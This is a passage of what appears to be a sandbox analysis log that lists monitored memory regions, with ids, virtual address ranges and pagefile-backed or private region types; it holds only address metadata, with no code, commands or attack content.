entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6875 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6876 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6877 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6878 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6879 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6880 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6881 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6882 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6883 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 6884 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 6885 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6886 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6887 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6888 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 6889 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 6890 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6891 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6892 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6893 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6894 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6895 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6896 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6897 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6898 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6899 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6900 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6901 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6902 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6903 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6904 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6905 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6906 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6907 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6908 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6909 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6910 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6911 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6912 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6913 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6914 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6915 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6916 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6917 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6918 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6919 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 6920 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 6921 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6922 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6923 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6924 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6925 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6926 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6927 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6928 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6929 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6930 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6931 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6932 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6933 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6934 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6935 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6936 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6937 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6938 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6939 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6940 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6941 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6942 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6943 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6944 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6945 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6946 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6947 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6948 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6949 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6950 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6951 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6952 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6953 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6954 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6955 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6956 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6957 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6958 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6959 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6960 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6961 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6962 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6963 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6964 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6965 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6966 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6967 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6968 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6969 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6970 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6971 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6972 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6973 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6974 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6975 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6976 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6977 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6978 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6979 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6980 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6981 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6982 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6983 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6984 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6985 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6986 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6987 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6988 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6989 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6990 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6991 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6992 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6993 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6994 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6995 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6996 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 6997 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 6998 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6999 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7000 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7001 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7002 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7003 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 7004 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 7005 start_va = 0x610000 end_va = 0x61dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7006 start_va = 0x610000 end_va = 0x61dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7007 start_va = 0x610000 end_va = 0x61dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7008 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 7009 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 7010 start_va = 0x1e80000 end_va = 0x1e8dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7011 start_va = 0x1e80000 end_va = 0x1e8dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7012 start_va = 0x1e80000 end_va = 0x1e8dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7013 start_va = 0x1e80000 end_va = 0x1e8dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7014 start_va = 0x1e80000 end_va = 0x1e8dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7015 start_va = 0x1e80000 end_va = 0x1e8dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7016 start_va = 0x1e80000 end_va = 0x1e8dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7017 start_va = 0x1e80000 end_va = 0x1e8dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7018 start_va = 0x1e80000 end_va = 0x1e8dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7019 start_va = 0x1e80000 end_va = 0x1e8dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7020 start_va = 0x1e80000 end_va = 0x1e8dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7021 start_va = 0x1e80000 end_va = 0x1e8dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7022 start_va = 0x1e80000 end_va = 0x1e8dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7023 start_va = 0x1e80000 end_va = 0x1e8dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7024 start_va = 0x1e80000 end_va = 0x1e8dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7025 start_va = 0x1e80000 end_va = 0x1e8dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7026 start_va = 0x1e80000 end_va = 0x1e8dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7027 start_va = 0x1e80000 end_va = 0x1e8dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7028 start_va = 0x1e80000 end_va = 0x1e8dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7029 start_va = 0x1e80000 end_va = 0x1e8dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7030 start_va = 0x1e80000 end_va = 0x1e8dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7031 start_va = 0x1e80000 end_va = 0x1e8dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7032 start_va = 0x1e80000 end_va = 0x1e8dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7033 start_va = 0x1e80000 end_va = 0x1e8dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7034 start_va = 0x1e80000 end_va = 0x1e8dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7035 start_va = 0x1e80000 end_va = 0x1e8dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7036 start_va = 0x1e80000 end_va = 0x1e8dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7037 start_va = 0x1e80000 end_va = 0x1e8dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7038 start_va = 0x1e80000 end_va = 0x1e8dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7039 start_va = 0x1e80000 end_va = 0x1e8dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7040 start_va = 0x1e80000 end_va = 0x1e8dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7041 start_va = 0x1e80000 end_va = 0x1e8dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7042 start_va = 0x1e80000 end_va = 0x1e8dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7043 start_va = 0x1e80000 end_va = 0x1e8dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7044 start_va = 0x610000 end_va = 0x61dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7045 start_va = 0x610000 end_va = 0x61dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7046 start_va = 0x610000 end_va = 0x61dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7047 start_va = 0x610000 end_va = 0x61dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7048 start_va = 0x610000 end_va = 0x61dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7049 start_va = 0x610000 end_va = 0x61dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7050 start_va = 0x610000 end_va = 0x61dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7051 start_va = 0x610000 end_va = 0x61dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7052 start_va = 0x610000 end_va = 0x61dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7053 start_va = 0x610000 end_va = 0x61dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7054 start_va = 0x610000 end_va = 0x61dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7055 start_va = 0x610000 end_va = 0x61dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7056 start_va = 0x610000 end_va = 0x61dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7057 start_va = 0x610000 end_va = 0x61dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7058 start_va = 0x610000 end_va = 0x61dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7059 start_va = 0x610000 end_va = 0x61dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7060 start_va = 0x610000 end_va = 0x61dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 